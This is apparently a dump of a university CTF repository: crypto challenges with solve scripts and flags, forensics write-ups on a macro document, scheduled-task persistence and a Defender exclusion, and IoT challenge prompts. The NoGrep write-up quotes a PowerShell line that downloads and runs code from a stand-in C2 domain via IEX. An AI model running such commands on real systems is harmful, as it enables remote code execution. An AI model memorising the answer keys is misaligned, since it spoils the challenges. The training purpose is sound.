"uoftctf{wH0_w0u1D_h4ve_7houGHt_l0ng_nONceS_CAnt_S4ve_w3ak_KeYS}" -------------------------------------------------------------------------------- /Cryptography/export-grade-cipher/src/start.sh: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | 3 | cd /ctf 4 | /usr/local/bin/python chal.py -------------------------------------------------------------------------------- /Cryptography/pianoman/README.md: -------------------------------------------------------------------------------- 1 | # pianoman 2 | 3 | Windy, a piano prodigy, believes that RSA encryption may not provide sufficient security to safeguard his invaluable piano mastery secrets. So, he uses his musical talents to add another layer of security to the RSA encryption scheme. Now, no one will be able to figure out his secrets! -------------------------------------------------------------------------------- /Cryptography/pianoman/chal/music_cipher.py: -------------------------------------------------------------------------------- 1 | # no secrets for you! 2 | flag = ... 3 | 4 | # Prime numbers 5 | p = 151974537061323957822386073908385085419559026351164685426097479266890291010147521691623222013307654711435195917538910433499461592808140930995554881397135856676650008657702221890681556382541341154333619026995004346614954741516470916984007797447848200982844325683748644670322174197570545222141895743221967042369 6 | q = 174984645401233071825665708002522121612485226530706132712010887487642973021704769474826989160974464933559818767568944237124745165979610355867977190192654030573049063822083356316183080709550520634370714336131664619311165756257899116089875225537979520325826655873483634761961805768588413832262117172840398661229 7 | n = p * q 8 | 9 | # a public exponent hidden away by Windy's musical talents 10 | e = ... 
11 | 12 | 13 | # Converting the message to an integer 14 | m = int.from_bytes(message.encode(), 'big') 15 | 16 | # Encrypting the message: c = m^e mod n 17 | inc_m = pow(message_int, e, n) 18 | 19 | print(encrypted_message_int) 20 | -------------------------------------------------------------------------------- /Cryptography/pianoman/chal/musical_e.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Cryptography/pianoman/chal/musical_e.png -------------------------------------------------------------------------------- /Cryptography/pianoman/chal/output.txt: -------------------------------------------------------------------------------- 1 | 13798492512038760070176175279601263544116956273815547670915057561532348462120753731852024424193899030774938204962799194756105401464136384387458651343975594539877218889319074841918281784494580079814736461158750759327630935335333130007375268812456855987866715978531148043248418247223808114476698088473278808360178546541128684643502788861786419871174570376835894025839847919827231356213726961581598139013383568524808876923469958771740011288404737208217659897319372970291073214528581692244433371304465252501970552162445326313782129351056851978201181794212716520630569898498364053054452320641433167009005762663177324539460 -------------------------------------------------------------------------------- /Cryptography/pianoman/src/gen.py: -------------------------------------------------------------------------------- 1 | # no secrets for you! 
2 | message = "uoftctf{AT1d2jMCVs03xxalViU9zTyiiV1INNJY}" 3 | 4 | # Prime numbers 5 | p = 151974537061323957822386073908385085419559026351164685426097479266890291010147521691623222013307654711435195917538910433499461592808140930995554881397135856676650008657702221890681556382541341154333619026995004346614954741516470916984007797447848200982844325683748644670322174197570545222141895743221967042369 6 | q = 174984645401233071825665708002522121612485226530706132712010887487642973021704769474826989160974464933559818767568944237124745165979610355867977190192654030573049063822083356316183080709550520634370714336131664619311165756257899116089875225537979520325826655873483634761961805768588413832262117172840398661229 7 | n = p * q 8 | 9 | # 7-digit a public exponent hidden away by Windy's musical talents 10 | e = 7029307 11 | 12 | 13 | # Converting the message to an integer 14 | message_int = int.from_bytes(message.encode(), 'big') 15 | 16 | # Encrypting the message: c = m^e mod n 17 | encrypted_message_int = pow(message_int, e, n) 18 | 19 | print(encrypted_message_int) 20 | -------------------------------------------------------------------------------- /Cryptography/pianoman/src/output.txt: -------------------------------------------------------------------------------- 1 | 13798492512038760070176175279601263544116956273815547670915057561532348462120753731852024424193899030774938204962799194756105401464136384387458651343975594539877218889319074841918281784494580079814736461158750759327630935335333130007375268812456855987866715978531148043248418247223808114476698088473278808360178546541128684643502788861786419871174570376835894025839847919827231356213726961581598139013383568524808876923469958771740011288404737208217659897319372970291073214528581692244433371304465252501970552162445326313782129351056851978201181794212716520630569898498364053054452320641433167009005762663177324539460 -------------------------------------------------------------------------------- 
/Cryptography/pianoman/src/solve.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import inverse 2 | 3 | # Prime numbers (p and q) 4 | p = 151974537061323957822386073908385085419559026351164685426097479266890291010147521691623222013307654711435195917538910433499461592808140930995554881397135856676650008657702221890681556382541341154333619026995004346614954741516470916984007797447848200982844325683748644670322174197570545222141895743221967042369 5 | q = 174984645401233071825665708002522121612485226530706132712010887487642973021704769474826989160974464933559818767568944237124745165979610355867977190192654030573049063822083356316183080709550520634370714336131664619311165756257899116089875225537979520325826655873483634761961805768588413832262117172840398661229 6 | 7 | # Computing n and Euler's Totient function (phi) 8 | n = p * q 9 | phi = (p - 1) * (q - 1) 10 | 11 | # find original e using music sheet cipher online 12 | e = 7029307 13 | 14 | # Computing the private exponent, d 15 | d = inverse(e, phi) 16 | 17 | 18 | # Encrypting the message: c = m^e mod n 19 | encrypted_message_int = 13798492512038760070176175279601263544116956273815547670915057561532348462120753731852024424193899030774938204962799194756105401464136384387458651343975594539877218889319074841918281784494580079814736461158750759327630935335333130007375268812456855987866715978531148043248418247223808114476698088473278808360178546541128684643502788861786419871174570376835894025839847919827231356213726961581598139013383568524808876923469958771740011288404737208217659897319372970291073214528581692244433371304465252501970552162445326313782129351056851978201181794212716520630569898498364053054452320641433167009005762663177324539460 20 | 21 | # Decrypting the message: m = c^d mod n 22 | decrypted_message_int = pow(encrypted_message_int, d, n) 23 | 24 | # Converting the decrypted integer back to a string 25 | decrypted_message = 
decrypted_message_int.to_bytes((decrypted_message_int.bit_length() + 7) // 8, 'big').decode() 26 | 27 | print(decrypted_message) 28 | -------------------------------------------------------------------------------- /Cryptography/repeat/README.md: -------------------------------------------------------------------------------- 1 | # repetitions 2 | 3 | I'm a known repeat offender when it comes to bad encryption habits. But the secrets module is secure, so you'll never be able to guess my key! -------------------------------------------------------------------------------- /Cryptography/repeat/chal/flag.enc: -------------------------------------------------------------------------------- 1 | Flag: 982a9290d6d4bf88957586bbdcda8681de33c796c691bb9fde1a83d582c886988375838aead0e8c7dc2bc3d7cd97a4 -------------------------------------------------------------------------------- /Cryptography/repeat/chal/gen.py: -------------------------------------------------------------------------------- 1 | import os 2 | import secrets 3 | 4 | flag = "REDACATED" 5 | xor_key = secrets.token_bytes(8) 6 | 7 | def xor(message, key): 8 | return bytes([message[i] ^ key[i % len(key)] for i in range(len(message))]) 9 | 10 | encrypted_flag = xor(flag.encode(), xor_key).hex() 11 | 12 | with open("flag.enc", "w") as f: 13 | f.write("Flag: "+encrypted_flag) -------------------------------------------------------------------------------- /Cryptography/repeat/src/flag.enc: -------------------------------------------------------------------------------- 1 | Flag: 982a9290d6d4bf88957586bbdcda8681de33c796c691bb9fde1a83d582c886988375838aead0e8c7dc2bc3d7cd97a4 -------------------------------------------------------------------------------- /Cryptography/repeat/src/gen.py: -------------------------------------------------------------------------------- 1 | import os 2 | import secrets 3 | 4 | flag = "uoftctf{x0r_iz_r3v3rs1bl3_w17h_kn0wn_p141n73x7}" 5 | xor_key = secrets.token_bytes(8) 6 | 7 | def 
xor(message, key): 8 | return bytes([message[i] ^ key[i % len(key)] for i in range(len(message))]) 9 | 10 | encrypted_flag = xor(flag.encode(), xor_key).hex() 11 | 12 | with open("flag.enc", "w") as f: 13 | f.write("Flag: "+encrypted_flag) -------------------------------------------------------------------------------- /Cryptography/repeat/src/solve.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | def xor(message, key): 4 | return bytes([message[i] ^ key[i % len(key)] for i in range(len(message))]) 5 | 6 | with open("flag.enc", "r") as f: 7 | encrypted_flag = f.read().split(" ")[1] 8 | f.close() 9 | encrypted_flag = bytes.fromhex(encrypted_flag) 10 | known_plaintext = "uoftctf{".encode() 11 | key = bytes([encrypted_flag[i] ^ known_plaintext[i] for i in range(len(known_plaintext))]) 12 | 13 | # decrypt flag 14 | flag = xor(encrypted_flag, key) 15 | print(flag.decode()) 16 | -------------------------------------------------------------------------------- /Cryptography/wheel-barrow/README.md: -------------------------------------------------------------------------------- 1 | A wheelbarrow ran over the flag. Can you fix it? 2 | 3 | Please wrap the flag in `uoftctf{}`. Please keep the `$` in the flag when submitting. 4 | -------------------------------------------------------------------------------- /Cryptography/wheel-barrow/chal/transformed.txt: -------------------------------------------------------------------------------- 1 | hc0rhh3r3ylmsrwr___lsewt_03raf_rpetouin$_3tb0_t 2 | -------------------------------------------------------------------------------- /Cryptography/wheel-barrow/src/solve.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | To solve, recognize that wheel-barrow transform is a pun on the Burrows-Wheeler Transform (BWT), a common technique in compression. 
3 | 4 | To decode texts written in BWT, the text must be in one of two formats 5 | - Text with an ending token like `$` 6 | - Text with an associated index indicating which entry is the correct string 7 | 8 | Commonly in literature surrounding the BWT, `$` represents the ending of the string, so we should recognize that. 9 | 10 | Because this text is written with an ending token, we should use an algorithm to decode it using that format. However, I'm lazy so we can instead use an existing BWT decoder that takes as input the index and the encoded string and attempts to decode it. Since we don't know the index of the correct string, we brute force the values from 1-47 since the index can be at most the length of the transformed text. The decoding that has the ending token `$` at the end of the string is the only valid decoding which we get as `th3_burr0w_wh33ler_transform_is_pr3tty_c00l_eh$` 11 | 12 | We can use any existing decoder to do so such as: https://www.dcode.fr/burrows-wheeler-transform 13 | 14 | The only valid index is 40 which we input to get the flag (here dcode calls it key). 15 | 16 | # Flag 17 | The flag is what we got just wrapped in `uoftctf{th3_burr0w_wh33ler_transform_is_pr3tty_c00l_eh$}`. 18 | -------------------------------------------------------------------------------- /Forensics/EnableMe/README.md: -------------------------------------------------------------------------------- 1 | # EnableMe 2 | 3 | You've received a confidential document! Follow the instructions to unlock it. 
-------------------------------------------------------------------------------- /Forensics/EnableMe/chal/invoice.docm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/EnableMe/chal/invoice.docm -------------------------------------------------------------------------------- /Forensics/EnableMe/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{d0cx_f1l35_c4n_run_c0de_t000} -------------------------------------------------------------------------------- /Forensics/EnableMe/solve/solve.py: -------------------------------------------------------------------------------- 1 | # Extract the macro manually or by using oletools. Python script is not necessary to solve the challenge, you can simply call MsgBox on v9 instead of v10. 2 | 3 | def xor(data, key): 4 | return ''.join(chr(char ^ ord(key[i % len(key)])) for i, char in enumerate(data)) 5 | 6 | enc_flag = [98, 120, 113, 99, 116, 99, 113, 108, 115, 39, 116, 111, 72, 113, 38, 123, 36, 34, 72, 116, 35, 121, 72, 101, 98, 121, 72, 116, 39, 115, 114, 72, 99, 39, 39, 39, 106] 7 | enc_msg = [44, 32, 51, 84, 43, 53, 48, 62, 68, 114, 38, 61, 17, 70, 121, 45, 112, 126, 26, 39, 21, 78, 21, 7, 6, 26, 127, 8, 89, 0, 1, 54, 26, 87, 16, 10, 84] 8 | 9 | flag_key = 23 10 | 11 | flag = xor(enc_flag, chr(flag_key)) 12 | msg = xor(enc_msg, flag) 13 | 14 | print(flag) 15 | print(msg) 16 | -------------------------------------------------------------------------------- /Forensics/EnableMe/src/macro.vba: -------------------------------------------------------------------------------- 1 | Sub AutoOpen() 2 | Dim v6 As Variant, v7 As Variant 3 | v6 = Array(98, 120, 113, 99, 116, 99, 113, 108, 115, 39, 116, 111, 72, 113, 38, 123, 36, 34, 72, 116, 35, 121, 72, 101, 98, 121, 72, 116, 39, 115, 114, 72, 99, 39, 39, 39, 106) 4 | v7 = Array(44, 
32, 51, 84, 43, 53, 48, 62, 68, 114, 38, 61, 17, 70, 121, 45, 112, 126, 26, 39, 21, 78, 21, 7, 6, 26, 127, 8, 89, 0, 1, 54, 26, 87, 16, 10, 84) 5 | 6 | Dim v8 As Integer: v8 = 23 7 | 8 | Dim v9 As String, v10 As String, v4 As String, i As Integer 9 | v9 = "" 10 | For i = 0 To UBound(v6) 11 | v9 = v9 & Chr(v6(i) Xor Asc(Mid(Chr(v8), (i Mod Len(Chr(v8))) + 1, 1))) 12 | Next i 13 | 14 | v10 = "" 15 | For i = 0 To UBound(v7) 16 | v10 = v10 & Chr(v7(i) Xor Asc(Mid(v9, (i Mod Len(v9)) + 1, 1))) 17 | Next i 18 | 19 | MsgBox v10 20 | End Sub 21 | 22 | -------------------------------------------------------------------------------- /Forensics/Hourglass/README.md: -------------------------------------------------------------------------------- 1 | # Hourglass 2 | 3 | W0mp W0mp would you look at that, once again the security engineering team forgot to install an EDR agent. 4 | 5 | We imaged this machine to pass it on to the forensics team, your task is to find IoCs and possibly the flags. 6 | 7 | GLHF - 0x157 8 | 9 | -------------------------------------------------------------------------------- /Forensics/Hourglass/chal/info.txt: -------------------------------------------------------------------------------- 1 | This is a large windows 10 vm. If you need the link feel free to reach out to me on discord 0x157. 
2 | -------------------------------------------------------------------------------- /Forensics/Hourglass/command.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Hourglass/command.png -------------------------------------------------------------------------------- /Forensics/Hourglass/solve/README.md: -------------------------------------------------------------------------------- 1 | ### Hourglass 2 | 3 | Category: **Forensics** 4 | 5 | Once we download the VM and import it into VirtualBox, we can start solving the challenge. 6 | 7 | Browsing around the Desktop, we are greeted with 2 files, `Readme.txt` and `flag.txt`: the readme contains the backstory of the challenge, and flag.txt has a fake flag inside of it. 8 | 9 | ![](init.png) 10 | 11 | If we take note of the challenge name, it becomes clear that the challenge has something to do with **`time`**. 12 | 13 | Knowing that this is a forensics challenge, we can first check out a utility that Windows offers called **Task Scheduler**. For people who are not sure what it is, essentially it's used to schedule tasks, very similar to how cron jobs work on Unix-like systems. 14 | 15 | ![](tasks.png) 16 | 17 | Checking out the tasks that are scheduled to run, we can quickly notice a weird task called `Security Scan`. If we inspect the task and look at its Actions, there seems to be an odd command running an executable called "stomp.exe". Not normal at all. Scheduled tasks are a common persistence mechanism, so an unfamiliar task with a reassuring name is worth recording as an IoC. 18 | 19 | The command also references one more file, located at *C:\Windows\DiagTrack\Settings\settings.txt* 20 | 21 | ![](../command.png) 22 | 23 | `Ky0tCiB1b2Z0Y3Rme1Q0c0tfU2NoM0R1bDNyX0ZVTn0KKy0t` 24 | 25 | Going to that file and opening it yields a base64 string, which when decoded should give us the flag.
26 | 27 | **uoftctf{T4sK_Sch3Dul3r_FUN}** 28 | -------------------------------------------------------------------------------- /Forensics/Hourglass/solve/init.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Hourglass/solve/init.png -------------------------------------------------------------------------------- /Forensics/Hourglass/solve/tasks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Hourglass/solve/tasks.png -------------------------------------------------------------------------------- /Forensics/Illusion/traffic.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Illusion/traffic.pcapng -------------------------------------------------------------------------------- /Forensics/NoGrep/README.md: -------------------------------------------------------------------------------- 1 | ### No Grep 2 | 3 | Category: **Forensics** 4 | 5 | "Use the VM from Hourglass to find the second flag on the system" 6 | 7 | Back at it again, this was a pretty straightforward challenge, involving some script analysis and viewing Microsoft Defender Exclusions. 8 | 9 | If we go to Defender settings -> Virus & Threat Protection -> Exclusions, we will see that a certain file is excluded from Windows Defender scanning. Very odd if you ask me. An exclusion that points at a single script is worth recording as an IoC, since it keeps Defender from inspecting that file. 10 | 11 | The full path that we can see is *C:\Windows\Web\Wallpaper\Theme2\update.ps1* 12 | 13 | ![](path.png) 14 | 15 | Let's visit the path and inspect the script content.
16 | 17 | ```powershell 18 | $String_Key = 'W0wMadeitthisfar' 19 | 20 | $NewValue = '$(' + (([int[]][char[]]$String | ForEach-Object { "[char]$($_)" }) -join '+') + ')' 21 | 22 | $chars = 34, 95, 17, 57, 2, 16, 3, 18, 68, 16, 12, 54, 4, 82, 24, 45, 35, 0, 40, 63, 20, 10, 58, 25, 3, 65, 0, 20 23 | 24 | $keyAscii = $String_Key.ToCharArray() | ForEach-Object { [int][char]$_ } 25 | 26 | $resultArray = $chars -bxor $keyAscii 27 | 28 | IEX (Invoke-WebRequest -Uri 'https://somec2attackerdomain.com/chrome.exe' -UseBasicParsing).Content 29 | 30 | ``` 31 | 32 | We can see what this script is doing in plaintext; it doesn't seem to be very obfuscated, right? Note that the last line downloads content from a remote URL and hands it to `IEX` (Invoke-Expression), which is worth recording as an IoC alongside the Defender exclusion. 33 | 34 | First thing to note here is the $String_Key variable as well as $chars. 35 | 36 | Looking at $resultArray, we can also see that those chars are getting *XORed* with the key we saw earlier. The key is 16 characters long and there are 28 values, so the key has to be repeated to cover all of them. 37 | 38 | Decrypt this using CyberChef, write your own XOR decryption script in Python, or fix up the PowerShell code to print the result. 39 | 40 | ![](decode.png) 41 | 42 | **uoftctf{0dd_w4y_t0_run_pw5h}** 43 | -------------------------------------------------------------------------------- /Forensics/NoGrep/decode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/NoGrep/decode.png -------------------------------------------------------------------------------- /Forensics/NoGrep/path.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/NoGrep/path.png -------------------------------------------------------------------------------- /Forensics/Secret Message 2/chal/redacted.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Secret Message 2/chal/redacted.png -------------------------------------------------------------------------------- /Forensics/Secret Message 2/solve/cropped.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Secret Message 2/solve/cropped.png -------------------------------------------------------------------------------- /Forensics/Secret Message 2/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{pokemon_catching_ezz} -------------------------------------------------------------------------------- /Forensics/Secret Message 2/solve/output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Secret Message 2/solve/output.png -------------------------------------------------------------------------------- /Forensics/Secret Message 2/solve/writeup.md: -------------------------------------------------------------------------------- 1 | Crop the image, then use [unredacter](https://github.com/bishopfox/unredacter) to decode the pixels into plaintext. Ensure that you modify the program to use the correct character set: 2 | 3 | ```ts 4 | const guessable_characters = 'abcdefghijklmnopqrstuvwxyz_ '; 5 | ``` 6 | 7 | # Output 8 | 9 | ![The output](output.png) 10 | 11 | The program gets the last character of the flag wrong, `a` instead of `z`. However, you can verify the last character is `z` by using the "Make Your Own Redacted Text" feature and comparing the output with the original image. All that's left is to wrap the output in `uoftctf{}`. 
12 | 13 | # Flag 14 | 15 | `uoftctf{pokemon_catching_ezz}` 16 | -------------------------------------------------------------------------------- /Forensics/Secret Message/chal/secret.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Secret Message/chal/secret.pdf -------------------------------------------------------------------------------- /Forensics/Secret Message/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{fired_for_leaking_secrets_in_a_pdf} -------------------------------------------------------------------------------- /Forensics/Secret Message/solve/writeup.md: -------------------------------------------------------------------------------- 1 | # Extract the flag 2 | 3 | Use the tool `pdftotext` to extract the text from the PDF file. 4 | 5 | ```bash 6 | pdftotext secret.pdf 7 | ``` 8 | 9 | # Output 10 | 11 | ``` 12 | Confidential Document 13 | TRANSCRIPT: A Very Private Conversation 14 | 15 | Person 1: "So, have you reviewed the latest security measures?" 16 | Person 2: "I have. The team's done a thorough job this time." 17 | Person 1: "Especially after the last breach, we couldn't take any chances." 18 | Person 2: "Absolutely. The new encryption protocols should prevent similar incidents." 19 | Person 1: "What about the insider threat? Any measures against that?" 20 | Person 2: "Yes, they've implemented strict access controls and regular audits." 21 | Person 1: "Good to hear. By the way, how's the CTF challenge coming along?" 22 | Person 2: "Oh, it's going great. We've got some tricky puzzles this time." 23 | Person 1: "Just make sure the flag is well-protected. We don't want a repeat of last time." 24 | Person 2: "Definitely not. The flag 'uoftctf{fired_for_leaking_secrets_in_a_pdf}' is securely 25 | embedded." 26 | Person 1: "Great. 
But remember, that's between us." 27 | Person 2: "Of course. Confidentiality is key in these matters." 28 | Person 1: "Alright, I trust your discretion. Let's keep it under wraps." 29 | Person 2: "Agreed. We'll debrief the team about general security, but specifics stay with us." 30 | Person 1: "Sounds like a plan. Let's meet next week for another update." 31 | Person 2: "Will do. Take care until then." 32 | ``` -------------------------------------------------------------------------------- /IoT/babys_first_iot/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2024 Aon plc 2 | 3 | Licensed under the Apache License, Version 2.0 (the "License"); 4 | you may not use this file except in compliance with the License. 5 | You may obtain a copy of the License at 6 | 7 | http://www.apache.org/licenses/LICENSE-2.0 8 | 9 | Unless required by applicable law or agreed to in writing, software 10 | distributed under the License is distributed on an "AS IS" BASIS, 11 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | See the License for the specific language governing permissions and 13 | limitations under the License. 14 | -------------------------------------------------------------------------------- /IoT/babys_first_iot/README.md: -------------------------------------------------------------------------------- 1 | # University of Toronto CTF 2024 2 | 3 | Flag 1 - Here is an FCC ID, Q87-WRT54GV81, what is the frequency in MHz for Channel 6 for that device? Submit the answer to port 3895. 4 | 5 | Flag 2 - What company makes the processor for this device? https://fccid.io/Q87-WRT54GV81/Internal-Photos/Internal-Photos-861588. Submit the answer to port 6318. 6 | 7 | Flag 3 - Submit the command used in U-Boot to look at the system variables to port 1337 as a GET request ex. http://35.225.17.48:1337/{command}. This output is needed for another challenge. 
8 | 9 | Flag 4 – Submit the full command you would use in U-Boot to set the proper environment variable to a /bin/sh process upon boot to get the flag on the webserver at port 7777. Do not include the ‘bootcmd’ command. It will be in the format of "something something=${something} something=something" Submit the answer on port 9123. 10 | 11 | Flag 5 - At http://35.225.17.48:1234/firmware1.bin you will find the firmware. Extract the contents, find the hidden back door in the file that is the first process to run on Linux, connect to the backdoor, submit the password to get the flag. Submit the password to port 4545. 12 | 13 | Flag 6 - At http://35.225.17.48:7777/firmware2.bin you will find another firmware, submit the number of lines in the ‘ethertypes’ file multiplied by 74598 for the flag on port 8888. 14 | 15 | Hint: If there is an issue with submitting an answer with a challenge, try including newlines and null characters. For example: ‘printf 'answer\n\0' | nc 35.225.17.48 port’ 16 | -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge4/printenv: -------------------------------------------------------------------------------- 1 | addmisc=setenv bootargs ${bootargs}console=ttyS0,${baudrate}panic=1 2 | baudrate=57600 3 | bootaddr=(0xBC000000 + 0x1e0000) 4 | bootargs=console=ttyS1,57600 root=/dev/mtdblock8 rts_hconf.hconf_mtd_idx=0 mtdparts=m25p80:256k(boot),128k(pib),1024k(userdata),128k(db),128k(log),128k(dbbackup),128k(logbackup),3072k(kernel),11264k(rootfs) 5 | bootcmd=bootm 0xbc1e0000 6 | bootfile=/vmlinux.img 7 | ethact=r8168#0 8 | ethaddr=00:00:00:00:00:00 9 | load=tftp 80500000 ${u-boot} 10 | loadaddr=0x82000000 11 | stderr=serial 12 | stdin=serial 13 | stdout=serial 14 | 15 | Environment size: 533/131068 bytes 16 | -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge6/Challenge6.7z: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Challenge6/Challenge6.7z -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge7/firmware2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Challenge7/firmware2.bin -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge8_9/.flag9/.flag9: -------------------------------------------------------------------------------- 1 | {I_Couldn't_Hide_From_You!} 2 | -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge8_9/Binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Challenge8_9/Binary -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge8_9/File/Binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Challenge8_9/File/Binary -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge8_9/flag8: -------------------------------------------------------------------------------- 1 | {Command_Injections_Are_Fun!} 2 | -------------------------------------------------------------------------------- 
/IoT/babys_first_iot/remote_chal/StartHackNight.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Challenge 1 4 | ./Submit_Chall1_answer/Challenge1& 5 | 6 | #Challenge 2 7 | ./Submit_Chall2_answer/Challenge2& 8 | 9 | #Challenge 3 10 | #Message Admin on Discord 11 | 12 | #Challenge 4 13 | python3 -m http.server 1337 -d ./Challenge4& 14 | 15 | #Challenge 5 16 | ./Submit_Chall5_answer/Challenge5& 17 | 18 | #Challenge 6 19 | python3 -m http.server 1234 -d ./Challenge6& 20 | ./Submit_Chall6_answer/Challenge6& 21 | 22 | #Challenge 7 23 | python3 -m http.server 7777 -d ./Challenge7& 24 | ./Submit_Chall7_answer/Challenge7& 25 | 26 | #Challenge 8 and 9 27 | python3 -m http.server 1111 -d ./Challenge8_9/File& 28 | ./Challenge8_9/Binary& 29 | -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Submit_Chall1_answer/Challenge1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Submit_Chall1_answer/Challenge1 -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Submit_Chall2_answer/Challenge2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Submit_Chall2_answer/Challenge2 -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Submit_Chall5_answer/Challenge5: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Submit_Chall5_answer/Challenge5 -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Submit_Chall6_answer/Challenge6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Submit_Chall6_answer/Challenge6 -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Submit_Chall7_answer/Challenge7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Submit_Chall7_answer/Challenge7 -------------------------------------------------------------------------------- /IoT/babys_first_iot/src/Challenge1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/src/Challenge1 -------------------------------------------------------------------------------- /Jail/baby_js_blacklist/README.md: -------------------------------------------------------------------------------- 1 | # Baby JS Blacklist 2 | 3 | I hate functions. I hate them so much, that I made it so that you can never call them! 4 | 5 | Note: Solving this challenge will unlock another challenge, "JS Blacklist". 
-------------------------------------------------------------------------------- /Jail/baby_js_blacklist/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20-bullseye-slim AS app 2 | RUN useradd -m ctfuser 3 | RUN chown root:root /home/ctfuser 4 | RUN chmod 755 /home/ctfuser 5 | 6 | WORKDIR /home/ctfuser/app 7 | 8 | COPY --chown=root:root package.json . 9 | COPY --chown=root:root chal.js . 10 | 11 | RUN npm install 12 | 13 | RUN echo "uoftctf{b4by_j4v4scr1p7_gr3w_up_4nd_b3c4m3_4_h4ck3r}" > /home/ctfuser/app/flag && \ 14 | 15 | chmod 444 /home/ctfuser/app/flag 16 | 17 | RUN chmod -R 555 /home/ctfuser/ 18 | 19 | FROM pwn.red/jail 20 | 21 | COPY --from=app / /srv 22 | 23 | COPY --chmod=555 run /srv/app/run 24 | 25 | ENV JAIL_PIDS=40 JAIL_MEM=100M JAIL_TIME=120 -------------------------------------------------------------------------------- /Jail/baby_js_blacklist/chal/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "js_jail", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "chal.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [], 